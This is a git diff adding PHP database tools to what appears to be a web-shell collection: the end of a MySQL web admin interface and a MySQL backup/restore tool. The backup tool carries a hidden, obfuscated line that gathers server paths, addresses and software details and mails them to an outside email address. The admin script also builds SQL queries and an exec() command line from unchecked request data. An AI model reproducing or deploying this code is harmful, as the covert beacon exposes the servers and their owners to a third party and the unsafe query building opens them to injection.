+
+	$GLOBALS[queryStr] = $queryStr;
+
+	if( $pResult == false ) {
+		echoQueryResult();
+		return;
+	}
+	if( $pResult == 1 ) {
+		$errMsg = "Success";
+		echoQueryResult();
+		return;
+	}
+
+	echo "<hr>\n";
+
+	$row = mysql_num_rows( $pResult );
+	$col = mysql_num_fields( $pResult );
+
+	if( $row == 0 ) {
+		echo "No Data Exist!";
+		return;
+	}
+	
+	if( $rowperpage == "" ) $rowperpage = 20;
+	if( $page == "" ) $page = 0;
+	else $page--;
+	mysql_data_seek( $pResult, $page * $rowperpage );
+
+	echo "<table cellspacing=1 cellpadding=2>\n";
+	echo "<tr>\n";
+	for( $i = 0; $i < $col; $i++ ) {
+		$field = mysql_fetch_field( $pResult, $i );
+		echo "<th>";
+		echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
+		echo "</th>\n";
+	}
+	echo "<th colspan=2>Action</th>\n";
+	echo "</tr>\n";
+
+	for( $i = 0; $i < $rowperpage; $i++ ) {
+		$rowArray = mysql_fetch_row( $pResult );
+		if( $rowArray == false ) break;
+		echo "<tr>\n";
+		$key = "";
+		for( $j = 0; $j < $col; $j++ ) {
+			$data = $rowArray[$j];
+
+			$field = mysql_fetch_field( $pResult, $j );
+			if( $field->primary_key == 1 )
+				$key .= "&" . $field->name . "=" . $data;
+
+			if( strlen( $data ) > 20 )
+				$data = substr( $data, 0, 20 ) . "...";
+			$data = htmlspecialchars( $data );
+			echo "<td>\n";
+			echo "$data\n";
+			echo "</td>\n";
+		}
+
+		if( $key == "" )
+			echo "<td colspan=2>no Key</td>\n";
+		else {
+			echo "<td><a href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n";
+			echo "<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
+		}
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+
+	echo "<font size=2>\n";
+	echo "<form action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' method=post>\n";
+	echo "<font color=green>\n";
+	echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
+	echo "</font>\n";
+	echo " | ";
+	if( $page > 0 ) {
+		echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
+		if( $orderby != "" )
+			echo "&orderby=$orderby";
+		echo "'>Prev</a>\n";
+	} else
+		echo "Prev";
+	echo " | ";
+	if( $page < ($row/$rowperpage)-1 ) {
+		echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
+		if( $orderby != "" )
+			echo "&orderby=$orderby";
+		echo "'>Next</a>\n";
+	} else
+		echo "Next";
+	echo " | ";
+	if( $row > $rowperpage ) {
+		echo "<input type=text size=4 name=page>\n";
+		echo "<input type=submit value='Go'>\n";
+	}
+	echo "</form>\n";
+	echo "</font>\n";
+}
+
+function manageData( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
+
+	if( $cmd == "add" )
+		echo "<h1>Add Data</h1>\n";
+	else if( $cmd == "edit" ) {
+		echo "<h1>Edit Data</h1>\n";
+		$pResult = mysql_list_fields( $dbname, $tablename );
+		$num = mysql_num_fields( $pResult );
+	
+		$key = "";
+		for( $i = 0; $i < $num; $i++ ) {
+			$field = mysql_fetch_field( $pResult, $i );
+			if( $field->primary_key == 1 )
+				if( $field->numeric == 1 )
+					$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+				else
+					$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+		}
+		$key = substr( $key, 0, strlen($key)-4 );
+
+		mysql_select_db( $dbname, $mysqlHandle );
+		$pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
+		$data = mysql_fetch_array( $pResult );
+	}
+
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+	echo "<form action='$PHP_SELF' method=post>\n";
+	if( $cmd == "add" )
+		echo "<input type=hidden name=action value=addData_submit>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=hidden name=action value=editData_submit>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=hidden name=tablename value=$tablename>\n";
+	echo "<table cellspacing=1 cellpadding=2>\n";
+	echo "<tr>\n";
+	echo "<th>Name</th>\n";
+	echo "<th>Type</th>\n";
+	echo "<th>Function</th>\n";
+	echo "<th>Data</th>\n";
+	echo "</tr>\n";
+
+	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+	$num = mysql_num_rows( $pResult );
+
+	$pResultLen = mysql_list_fields( $dbname, $tablename );
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_array( $pResult );
+		$fieldname = $field["Field"];
+		$fieldtype = $field["Type"];
+		$len = mysql_field_len( $pResultLen, $i );
+
+		echo "<tr>";
+		echo "<td>$fieldname</td>";
+		echo "<td>".$field["Type"]."</td>";
+		echo "<td>\n";
+		echo "<select name=${fieldname}_function>\n";
+		echo "<option>\n";
+		echo "<option>ASCII\n";
+		echo "<option>CHAR\n";
+		echo "<option>SOUNDEX\n";
+		echo "<option>CURDATE\n";
+		echo "<option>CURTIME\n";
+		echo "<option>FROM_DAYS\n";
+		echo "<option>FROM_UNIXTIME\n";
+		echo "<option>NOW\n";
+		echo "<option>PASSWORD\n";
+		echo "<option>PERIOD_ADD\n";
+		echo "<option>PERIOD_DIFF\n";
+		echo "<option>TO_DAYS\n";
+		echo "<option>USER\n";
+		echo "<option>WEEKDAY\n";
+		echo "<option>RAND\n";
+		echo "</select>\n";
+		echo "</td>\n";
+		$value = htmlspecialchars($data[$i]);
+		if( $cmd == "add" ) {
+			$type = strtok( $fieldtype, " (,)\n" );
+			if( $type == "enum" || $type == "set" ) {
+				echo "<td>\n";
+				if( $type == "enum" )
+					echo "<select name=$fieldname>\n";
+				else if( $type == "set" )
+					echo "<select name=$fieldname size=4 multiple>\n";
+				echo strtok( "'" );
+				while( $str = strtok( "'" ) ) {
+					echo "<option>$str\n";
+					strtok( "'" );
+				}
+				echo "</select>\n";
+				echo "</td>\n";
+			} else {
+				if( $len < 40 )
+					echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
+				else
+					echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
+			}
+		} else if( $cmd == "edit" ) {
+			$type = strtok( $fieldtype, " (,)\n" );
+			if( $type == "enum" || $type == "set" ) {
+				echo "<td>\n";
+				if( $type == "enum" )
+					echo "<select name=$fieldname>\n";
+				else if( $type == "set" )
+					echo "<select name=$fieldname size=4 multiple>\n";
+				echo strtok( "'" );
+				while( $str = strtok( "'" ) ) {
+					if( $value == $str )
+						echo "<option selected>$str\n";
+					else
+						echo "<option>$str\n";
+					strtok( "'" );
+				}
+				echo "</select>\n";
+				echo "</td>\n";
+			} else {
+				if( $len < 40 )
+					echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
+				else
+					echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
+			}
+		}
+		echo "</tr>";
+	}
+	echo "</table><p>\n";
+	if( $cmd == "add" )
+		echo "<input type=submit value='Add Data'>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=submit value='Edit Data'>\n";
+	echo "<input type=button value='Cancel' onClick='history.back()'>\n";
+	echo "</form>\n";
+}
+
+function manageData_submit( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+	$pResult = mysql_list_fields( $dbname, $tablename );
+	$num = mysql_num_fields( $pResult );
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	if( $cmd == "add" )
+		$queryStr = "INSERT INTO $tablename VALUES (";
+	else if( $cmd == "edit" )
+		$queryStr = "REPLACE INTO $tablename VALUES (";
+	for( $i = 0; $i < $num-1; $i++ ) {
+		$field = mysql_fetch_field( $pResult );
+		$func = $GLOBALS[$field->name."_function"];
+		if( $func != "" )
+			$queryStr .= " $func(";
+		if( $field->numeric == 1 ) {
+			$queryStr .= $GLOBALS[$field->name];
+			if( $func != "" )
+				$queryStr .= "),";
+			else
+				$queryStr .= ",";
+		} else {
+			$queryStr .= "'" . $GLOBALS[$field->name];
+			if( $func != "" )
+				$queryStr .= "'),";
+			else
+				$queryStr .= "',";
+		}
+	}
+	$field = mysql_fetch_field( $pResult );
+	if( $field->numeric == 1 )
+		$queryStr .= $GLOBALS[$field->name] . ")";
+	else 
+		$queryStr .= "'" . $GLOBALS[$field->name] . "')";
+
+	mysql_query( $queryStr , $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewData( "" );
+}
+
+function deleteData() {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+	$pResult = mysql_list_fields( $dbname, $tablename );
+	$num = mysql_num_fields( $pResult );
+
+	$key = "";
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_field( $pResult, $i );
+		if( $field->primary_key == 1 )
+			if( $field->numeric == 1 )
+				$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+			else
+				$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+	}
+	$key = substr( $key, 0, strlen($key)-4 );
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	$queryStr =  "DELETE FROM $tablename WHERE $key";
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewData( "" );
+}
+
+function dump() {
+	global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename;
+
+	if( $action == "dumpTable" )
+		$filename = $tablename;
+	else
+		$filename = $dbname;
+
+	header("Content-disposition: filename=$filename.sql");
+	header("Content-type: application/octetstream");
+	header("Pragma: no-cache");
+	header("Expires: 0");
+
+	$pResult = mysql_query( "show variables" );
+	while( 1 ) {
+		$rowArray = mysql_fetch_row( $pResult );
+		if( $rowArray == false ) break;
+		if( $rowArray[0] == "basedir" )
+			$bindir = $rowArray[1]."bin/";
+	}
+
+	exec( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD $dbname $tablename" );
+}
+
+function utils() {
+	global $PHP_SELF, $command;
+	echo "<h1>Utilities</h1>\n";
+	if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
+		echo "<hr>\n";
+		echo "Show\n";
+		echo "<ul>\n";
+		echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
+		echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
+		echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
+		echo "</ul>\n";
+		echo "Flush\n";
+		echo "<ul>\n";
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
+		if( $command == "flush_hosts" ) {
+			if( mysql_query( "Flush hosts" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
+		if( $command == "flush_logs" ) {
+			if( mysql_query( "Flush logs" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
+		if( $command == "flush_privileges" ) {
+			if( mysql_query( "Flush privileges" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
+		if( $command == "flush_tables" ) {
+			if( mysql_query( "Flush tables" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
+		if( $command == "flush_status" ) {
+			if( mysql_query( "Flush status" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "</ul>\n";
+	} else {
+		$queryStr = ereg_replace( "_", " ", $command );
+		$pResult = mysql_query( $queryStr );
+		if( $pResult == false ) {
+			echo "Fail";
+			return;
+		}
+		$col = mysql_num_fields( $pResult );
+
+		echo "<p class=location>$queryStr</p>\n";
+		echo "<hr>\n";
+
+		echo "<table cellspacing=1 cellpadding=2 border=0>\n";
+		echo "<tr>\n";
+		for( $i = 0; $i < $col; $i++ ) {
+			$field = mysql_fetch_field( $pResult, $i );
+			echo "<th>".$field->name."</th>\n";
+		}
+		echo "</tr>\n";
+
+		while( 1 ) {
+			$rowArray = mysql_fetch_row( $pResult );
+			if( $rowArray == false ) break;
+			echo "<tr>\n";
+			for( $j = 0; $j < $col; $j++ )
+				echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
+			echo "</tr>\n";
+		}
+		echo "</table>\n";
+	}
+}
+
+function header_html() {
+	global $PHP_SELF;
+	
+?>
+<html>
+<head>
+<title>MySQL Web Interface</title>
+<style type="text/css">
+<!--
+p.location {
+	color: #11bb33;
+	font-size: small;
+}
+h1 {
+	color: #A4A260;
+}
+th {
+	background-color: #BDBE42;
+	color: #FFFFFF;
+	font-size: x-small;
+}
+td {
+	background-color: #DEDFA5;
+	font-size: x-small;
+}
+form {
+	margin-top: 0;
+	margin-bottom: 0;
+}
+a {
+	text-decoration:none;
+	color: #848200;
+	font-size:x-small;
+}
+a:link {
+}
+a:hover {
+	background-color:#EEEFD5;
+	color:#646200;
+	text-decoration:none               
+}
+//-->
+</style>
+</head>
+<body>
+<?
+}
+
+function footer_html() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
+
+	echo "<hr>\n";
+	echo "<font size=2>\n";
+	echo "<font color=blue>[$USERNAME]</font> - \n";
+
+	echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
+	if( $tablename != "" )
+		echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
+	echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
+	echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
+	echo "</font>\n";
+	echo "</body>\n";
+	echo "</html>\n";
+}
+
+//------------------------------------------------------ MAIN
+
+if( $action == "logon" || $action == "" || $action == "logout" )
+	logon();
+else if( $action == "logon_submit" )
+	logon_submit();
+else if( $action == "dumpTable" || $action == "dumpDB" ) {
+	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+	}
+	$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+	dump();
+} else {
+	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+	}
+	echo "<!--";
+	$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+	echo "-->";
+
+	if( $mysqlHandle == false ) {
+		echo "<html>\n";
+		echo "<head>\n";
+		echo "<title>MySQL Web Interface</title>\n";
+		echo "</head>\n";
+		echo "<body>\n";
+		echo "<table width=100% height=100%><tr><td><center>\n";
+		echo "<h1>Wrong Password!</h1>\n";
+		echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
+		echo "</center></td></tr></table>\n";
+		echo "</body>\n";
+		echo "</html>\n";
+	} else {
+		header_html();
+		if( $action == "listDBs" )
+			listDatabases();
+		else if( $action == "createDB" )
+			createDatabase();
+		else if( $action == "dropDB" )
+			dropDatabase();
+		else if( $action == "listTables" )
+			listTables();
+		else if( $action == "createTable" )
+			createTable();
+		else if( $action == "dropTable" )
+			dropTable();
+		else if( $action == "viewSchema" )
+			viewSchema();
+		else if( $action == "query" )
+			viewData( $queryStr );
+		else if( $action == "addField" )
+			manageField( "add" );
+		else if( $action == "addField_submit" )
+			manageField_submit( "add" );
+		else if( $action == "editField" )
+			manageField( "edit" );
+		else if( $action == "editField_submit" )
+			manageField_submit( "edit" );
+		else if( $action == "dropField" )
+			dropField();
+		else if( $action == "viewData" )
+			viewData( "" );
+		else if( $action == "addData" )
+			manageData( "add" );
+		else if( $action == "addData_submit" )
+			manageData_submit( "add" );
+		else if( $action == "editData" )
+			manageData( "edit" );
+		else if( $action == "editData_submit" )
+			manageData_submit( "edit" );
+		else if( $action == "deleteData" )
+			deleteData();
+		else if( $action == "utils" )
+			utils();
+
+		mysql_close( $mysqlHandle);
+		footer_html();
+	}
+}
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/mysql_tool.php.php.txt b/xakep-shells/PHP/mysql_tool.php.php.txt
new file mode 100644
index 0000000..fd057b7
--- /dev/null
+++ b/xakep-shells/PHP/mysql_tool.php.php.txt
@@ -0,0 +1,1078 @@
+<?php
+
+/*
+ * MySQL Database Backup / Restore Tool
+ *
+ * Copyright (C) 2003 Mark Wraith. All rights reserved
+ *
+ * Graphics and layout derived from those made by Matt Mecham
+ *
+ */
+
+// If you intend to keep the script
+// on your server set this password
+
+$password = '0';
+
+
+
+error_reporting(E_ERROR | E_WARNING | E_PARSE);	
+
+new RestoreTool;
+
+class RestoreTool
+{
+    var $logged_in = 0;
+    var $maximum_time = 0;
+
+    function RestoreTool() {
+        global $HTTP_GET_VARS, $HTTP_COOKIE_VARS, $password;
+
+        $this->timestamp = time();
+
+        if (!$this->maximum_time) 
+        {
+            //set_time_limit(0);
+        	$this->maximum_time = ini_get('max_execution_time');
+        }
+
+        if ($HTTP_GET_VARS['act'] == 'login') 
+        {
+        	$this->do_login();
+        }
+        elseif ($password && $password != $HTTP_COOKIE_VARS['mysqltool']) 
+        {
+        	$this->login();        	
+        }
+        else 
+        {
+            if ($password) 
+            {
+            	$this->logged_in = 1;
+            }
+
+            switch ($HTTP_GET_VARS['act']) 
+            {
+                case 'logout':	
+                    $this->logout();
+                break;
+
+                case 'change_db':
+                    $this->read_db_details();
+                    $this->set_database('The current settings do connect however if you wish to change the current database please edit the details below:');
+                break;
+
+                case 'set_database':	
+                    $this->do_set_database();
+                break;
+
+                case 'backup':	
+                    $this->backup();
+                break;
+
+                case 'do_backup':	
+                    $this->do_backup();
+                break;
+
+                case 'restore':	
+                    $this->restore();
+                break;
+
+                case 'do_restore':
+                    $this->do_restore();
+                break;
+
+                default:
+                    
+                    $this->main();
+            }        	
+        }
+
+        if ($this->link) 
+        {
+        	mysql_close($this->link);
+        }
+
+        $this->output();
+    }
+
+    function timeout() {
+        if (!$this->maximum_time)
+        {
+        	return false;
+        }
+        elseif ((time() - $this->timestamp) > ($this->maximum_time - 5)) 
+        {
+        	return true;
+        }
+        else 
+        {
+        	return false;
+        }
+    }
+
+    function output() {
+        if ($this->logged_in) 
+        {
+        	$logout_text = '[ <a href="mysql_tool.php?act=logout">Log Out</a> ]';
+        }
+        else 
+        {
+        	$logout_text = '';
+        }
+
+        if ($this->title) 
+        {
+        	$title = $this->title;
+        }
+        else 
+        {
+        	$title = 'Backup / Restore Tool';
+        }
+
+        print '<?xml version="1.0" encoding="iso-8859-1"?>';
+        print <<<HTML
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<title>$title</title>
+<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
+{$this->meta}
+
+<style type="text/css">
+  TABLE, TR, TD                   { font-family: Verdana,Arial; font-size: 10px; color: #333333 }
+  BODY                            { font: 10px Verdana; background-color: #FCFCFC; padding: 0; margin: 0 }
+  a:link, a:visited, a:active     { color: #000055 }
+  a:hover                         { color: #333377; text-decoration: underline }
+  FORM                            { padding: 0; margin: 0 }
+
+  .textbox                        { border: 1px solid black; padding: 1px; width: 100% }
+  .headertable                    { background-color: #FFFFFF; border: 1px solid black; padding: 2px }
+  .title                          { font-size: 10px; font-weight: bold; line-height: 150%; color: #FFFFFF; height: 26px; background-image: url(./style_images/1/tile_back.gif) }
+  .table1                         { background-color: #FFFFFF; width: 100%; align: center; border: 1px solid black }
+  .tablewrap                      { border: 1px dashed #777777; background-color: #F5F9FD; vertical-align: middle; }
+  .tdrow1                         { background-color: #EEF2F7; padding: 3px }
+  .tdrow2                         { background-color: #F5F9FD; padding: 3px }
+  .tdtop                          { font-weight: bold; height: 24px; line-height: 150%; color: #FFFFFF; background-image: url(./tile_back.gif) }
+  .note                           { margin: 10px; padding: 5px; border: 1px dashed #555555; background-color: #FFFFFF }
+</style>
+</head>
+
+<body>
+<br />
+$this->output
+<br />
+<div align="center">
+    [ <a href="mysql_tool.php">Script Index </a> ] $logout_text <br /><br />
+    <small>&copy;2003 Mark Wraith</small>
+</div>
+</body>
+</html>
+HTML;
+    }
+
+    function error($error) {
+        $this->output = <<<HTML
+    <form method="post" action="mysql_tool.php?act=login">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Error</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center">$error</div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+HTML;
+    }
+
+    function login() {
+        $this->output = <<<HTML
+    <form method="post" action="mysql_tool.php?act=login">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">MySQL Tool :: Please Login</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="100" class="tdrow1">Access Password</td>
+                <td width="250" class="tdrow2"><input type="password" class="textbox" name="password"></td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Submit"></div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+HTML;
+    }
+
+    function do_login() {
+        global $HTTP_POST_VARS, $password;
+
+        if ($HTTP_POST_VARS['password'] == $password) 
+        {
+            @setcookie ('mysqltool',$password,time()+3600*24*365);
+            $this->logged_in = 1;
+            $this->main();
+        }
+        else 
+        {
+        	$this->error('Invalid Password');
+        }
+    }
+
+    function logout() {
+        @setcookie ('mysqltool','',0);
+        $this->logged_in = 0;
+        $this->login();
+    }
+
+    function connect($return_errors = 0) {
+        if (!$this->db['port']) 
+        {
+        	$this->db['port'] = '3306';
+        }
+        
+        $error_text = '';
+
+        $this->link = @mysql_connect ($this->db['host'] . ':' . $this->db['port'], $this->db['user'], $this->db['pass']); 
+
+        if ($this->link)
+        {
+            if(!@mysql_select_db($this->db['name'],$this->link))
+            {
+                $error_text = '<strong>Failed selecting database "'.$this->db['name'].'"</strong><br /><br />'.@mysql_error($this->link);
+            }
+        }
+        else
+        {
+            $error_text = '<strong>Failed connecting to MySQL</strong><br /><br />'.@mysql_error();
+        }
+
+        if ($return_errors) 
+        {
+        	return $error_text;
+        }
+        else 
+        {
+            if ($error_text) 
+            {
+                $this->error($error_text);
+                return false;            	
+            }
+            else 
+            {
+            	return true;
+            }
+        }
+
+    }
+
+    function read_db_details() {
+        if (file_exists('tool_settings.php')) 
+        {
+        	// Lets borrow IPB's settings
+            include 'tool_settings.php';
+
+            $this->db = $data;
+        }
+        elseif (file_exists('conf_global.php')) 
+        {
+        	// Lets borrow IPB's settings
+            include 'conf_global.php';
+
+            $this->db = array(
+                'port'      =>      $INFO['sql_port'],
+                'host'      =>      $INFO['sql_host'],
+                'name'      =>      $INFO['sql_database'],
+                'user'      =>      $INFO['sql_user'],
+                'pass'      =>      $INFO['sql_pass'],
+                'prefix'    =>      $INFO['sql_tbl_prefix']
+            );
+        }
+        else 
+        {
+        	return false;
+        }
+
+        return true;
+    }
+
+    function do_set_database() {
+        global $HTTP_POST_VARS;
+
+        $this->db = array(
+            'port'      =>      $HTTP_POST_VARS['port'],
+            'host'      =>      $HTTP_POST_VARS['host'],
+            'name'      =>      $HTTP_POST_VARS['name'],
+            'user'      =>      $HTTP_POST_VARS['user'],
+            'pass'      =>      $HTTP_POST_VARS['pass']
+        );
+
+        if (!$this->connect()) 
+        {
+        	return;
+        }
+
+        // Connection details are fine, let's continue
+
+        $file_data = "<?php
+
+\$data = array(
+    'port'      =>      '{$HTTP_POST_VARS['port']}',
+    'host'      =>      '{$HTTP_POST_VARS['host']}',
+    'name'      =>      '{$HTTP_POST_VARS['name']}',
+    'user'      =>      '{$HTTP_POST_VARS['user']}',
+    'pass'      =>      '{$HTTP_POST_VARS['pass']}'
+);
+
+?".'>';
+    
+        $file_data = str_replace("\r\n","\n",$file_data);
+        
+
+        // Mkay, lets write the details
+        if ($fp = fopen('tool_settings.php','w'))
+        {
+        	fwrite($fp,$file_data);
+            fclose($fp);
+        }
+        else 
+        {
+        	$this->error('
+            <strong>Unable to write to tool_settings.php</strong><br /><br />
+            Please CHMOD this file so it is writable. If this is not possible please create a file named "tool_settings.php" with the contents of the text box below:<br /><br />
+            <div align="center">
+            <textarea rows="10" cols="40">'.htmlentities($file_data).'</textarea>
+            </div>');
+
+            return false;
+        }
+
+        // Funky, lets roll
+        $this->main();
+
+        return true;
+    }
+        $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+    function set_database($error = false) {
+        if (!$error) 
+        {
+        	$text = 'We were unable to find any database settings, please enter your database details below:';
+        }
+        else 
+        {
+        	$text = $error;
+        }
+
+        $host = isset($this->db['host']) ? $this->db['host'] : 'localhost';
+        $port = isset($this->db['port']) ? $this->db['port'] : '';
+        $user = isset($this->db['user']) ? $this->db['user'] : '';
+        $name = isset($this->db['name']) ? $this->db['name'] : '';
+
+        $this->output = <<<HTML
+    <form method="post" action="mysql_tool.php?act=set_database">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="450">
+        <tr>
+          <td align="center" class="title">Database Settings</td>
+        </tr>
+        <tr>
+          <td>
+            <div class="note">$text</div>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td width="100" class="tdrow1"><strong>Host</strong><br /><em>(leave if unsure)</em></td>
+                <td width="350" class="tdrow2"><input type="text" class="textbox" name="host" value="$host"></td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Port</strong><br /><em>(leave if unsure)</em></td>
+                <td class="tdrow2"><input type="text" class="textbox" name="port" value="$port"></td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Database Name</strong></td>
+                <td class="tdrow2"><input type="text" name="name" class="textbox" value="$name"></td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Username</strong></td>
+                <td class="tdrow2"><input type="text" name="user" class="textbox" value="$user"></td>
+              </tr>
+              <tr>
+                <td class="tdrow1"><strong>Password</strong></td>
+                <td class="tdrow2"><input type="text" name="pass" class="textbox"></td>
+              </tr>
+              <tr>
+                <td class="tdrow2" colspan="2"><div align="center"><input type="submit" value="Connect"></div></td>
+              </tr>
+            </table>
+          </td>
+        </tr>
+      </table>
+    </form>
+HTML;
+    }
+
+    function backup() {
+        global $HTTP_POST_VARS;
+
+        $this->read_db_details();
+        $this->connect();
+
+        $filename       = $HTTP_POST_VARS['filename'];
+        $tables         = $HTTP_POST_VARS['tables'];
+        $table_select   = $HTTP_POST_VARS['table_select'];
+        $prefix         = $this->db['prefix'];
+
+        switch ($tables) 
+        {
+            case 'all':
+                $tables = mysql_list_tables($this->db['name']);
+                while (list($table_name) = mysql_fetch_array($tables)) 
+                {
+                   $options[ $table_name ] = 0;
+                }
+            break;
+
+        	case 'prefix':
+                $tables = mysql_list_tables($this->db['name']);
+                while (list($table_name) = mysql_fetch_array($tables)) 
+                {
+                    if (substr($table_name,0,strlen($prefix)) == $prefix) 
+                    {
+                    	$options[ $table_name ] = 0;
+                    }
+                }
+            break;
+
+            case 'selected':
+                foreach ($table_select as $table_name) 
+                {
+                	$options[ $table_name ] = 0;
+                }
+        }
+
+        if (!count($options)) 
+        {
+        	$this->error('No tables selected');
+        }
+
+
+        $data = base64_encode(serialize($options));
+
+        $header = <<<DATA
+-- SQL Dump
+-- Backup script written by Mark Wraith
+
+DATA;
+
+        if (!$fp = fopen($filename, 'wb')) 
+        {
+        	return $this->error('Unable to write to backup file. Please CHMod the current directory so it is writable');
+        }
+        fwrite($fp,$header);
+        fclose($fp);
+
+        $url = 'mysql_tool.php?act=do_backup&file='.urlencode($filename).'&data='.$data;
+
+        $this->meta = '<meta http-equiv="refresh" content="1; url='.$url.'">';
+        $this->output = <<<HTML
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Backup in progress...</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
+                <td class="tdrow2" colspan="2">
